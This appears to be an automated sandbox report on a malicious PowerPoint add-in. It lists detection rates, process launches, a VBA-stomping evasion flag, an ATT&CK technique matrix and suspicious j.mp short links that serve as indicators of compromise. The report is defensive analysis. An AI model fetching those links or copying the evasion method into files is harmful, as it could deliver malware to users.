Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE indicator, VBA macros: true
Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: PO04012022.ppamVirustotal: Detection: 12%
Source: PO04012022.ppamReversingLabs: Detection: 27%
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\PO04012022.ppam"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam" /ou "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam" /ou "Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{70D4C3B7-E911-4ABC-A60E-695677A2A539} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal64.expl.evad.winPPAM@6/6@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed

HIPS / PFW / Operating System Protection Evasion:

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detectionShow sources
Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam" /ou "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22DLL Side-Loading1Process Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Scripting22Security Account ManagerSystem Information Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PO04012022.ppam13%VirustotalBrowse
PO04012022.ppam28%ReversingLabsDocument-Word.Trojan.Heuristic
PO04012022.ppam100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFC4F56B0AF15685FD.TMP100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
http://www.j.mp/asksdkahopopopopdskd0%VirustotalBrowse
http://www.j.mp/asksdkahopopopopdskd0%Avira URL Cloudsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
http://www.j.mp/asksdkahjhjhjaoskdoaasdskd0%Avira URL Cloudsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-user.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
http://www.j.mp/asksdkahjhtytytyhoaasdskd:0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
http://www.j.mp/0%Avira URL Cloudsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
http://www.j.mp/ask0%Avira URL Cloudsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://www.j.mp/asksdkahjhhhhtttrrhghghoaasdskd80%Avira URL Cloudsafe
http://www.j.mp/asksdkahjhhhhtttrroaasdskd:0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
http://www.j.mp/asksdkazxzxzxzxkd0%Avira URL Cloudsafe
http://www.j.mp/askswewewewzxzxkd0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
    high
    https://login.microsoftonline.com/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
      high
      https://shell.suite.office.com:144315A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
          high
          https://autodiscover-s.outlook.com/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
            high
            https://roaming.edog.15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
              high
              https://cdn.entity.15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                    high
                    https://powerlift.acompli.net15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v115A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                      high
                      http://www.j.mp/asksdkahopopopopdskdqwqwae.dfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://cortana.ai15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                high
                                https://api.aadrm.com/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                • URL Reputation: safe
                                unknown
                                http://www.j.mp/asksdkahjhjhjaoskdoaasdskdqwqwae.dfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                      high
                                      https://cr.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                        high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://portal.office.com/account/?ref=ClientMeControl15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                          high
                                          https://graph.ppe.windows.net15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-user.acompli.net15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                high
                                                http://www.j.mp/asksdkahjhtytytyhoaasdskd:qwqwae.dfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://store.office.cn/addinstemplate15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.aadrm.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                      high
                                                      https://dev0-api.acompli.net/autodetect15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                          high
                                                          https://api.addins.store.officeppe.com/addinstemplate15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://graph.windows.net15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.j.mp/qwqwae.dtrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.j.mp/ask~DF7C77FA3DFFBB1450.TMP.8.dr, ~DFC4F56B0AF15685FD.TMP.8.drtrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                            high
                                                                            http://www.j.mp/asksdkahjhhhhtttrrhghghoaasdskd8qwqwae.dfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.j.mp/asksdkahjhhhhtttrroaasdskd:qwqwae.dfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://apis.live.net/v5.0/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                  high
                                                                                  https://management.azure.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                    high
                                                                                    https://outlook.office365.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                high
                                                                                                https://api.office.net15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                          high
                                                                                                          https://substrate.office.com/search/api/v2/init15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v1/SearchHistory15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                        high
                                                                                                                        http://www.j.mp/asksdkazxzxzxzxkdqwqwae.dfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.j.mp/askswewewewzxzxkdqwqwae.dtrue
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://management.azure.com/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorize15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drfalse
                                                                                                                                      high

                                                                                                                                      Contacted IPs

                                                                                                                                      No contacted IP infos

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                      Analysis ID:548357
                                                                                                                                      Start date:05.01.2022
                                                                                                                                      Start time:16:11:49
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 4m 41s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Sample file name:PO04012022.ppam
                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                      Number of analysed new started processes analysed:27
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • GSI enabled (VBA)
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal64.expl.evad.winPPAM@6/6@0/0
                                                                                                                                      EGA Information:Failed
                                                                                                                                      HDC Information:Failed
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      • Number of executed functions: 0
                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Adjust boot time
                                                                                                                                      • Enable AMSI
                                                                                                                                      • Found application associated with file extension: .ppam
                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                      • Found warning dialog
                                                                                                                                      • Click Ok
                                                                                                                                      • Attach to Office via COM
                                                                                                                                      • Scroll down
                                                                                                                                      • Close Viewer
                                                                                                                                      Warnings:
                                                                                                                                      Show All
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.177, 52.109.88.37, 52.109.12.23
                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                      • Report size getting too big, too many NtSetValueKey calls found.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      No simulations

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      No context

                                                                                                                                      Domains

                                                                                                                                      No context

                                                                                                                                      ASN

                                                                                                                                      No context

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\15A6FD1E-D718-4226-8314-16CB9ACBBD54
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
